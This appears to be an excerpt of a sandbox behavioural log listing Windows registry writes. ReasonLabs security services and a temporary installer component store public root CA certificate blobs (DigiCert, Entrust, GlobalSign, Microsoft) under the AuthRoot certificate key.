Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 5c000000010000000400000000080000190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd940400000001000000100000004be2c99196650cf40e5a9392a00afeb22000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d42000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd942000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf50f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e0b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000006200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e1270090000000100000016000000301406082b0601050507030306082b06010505070308140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa21900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d0101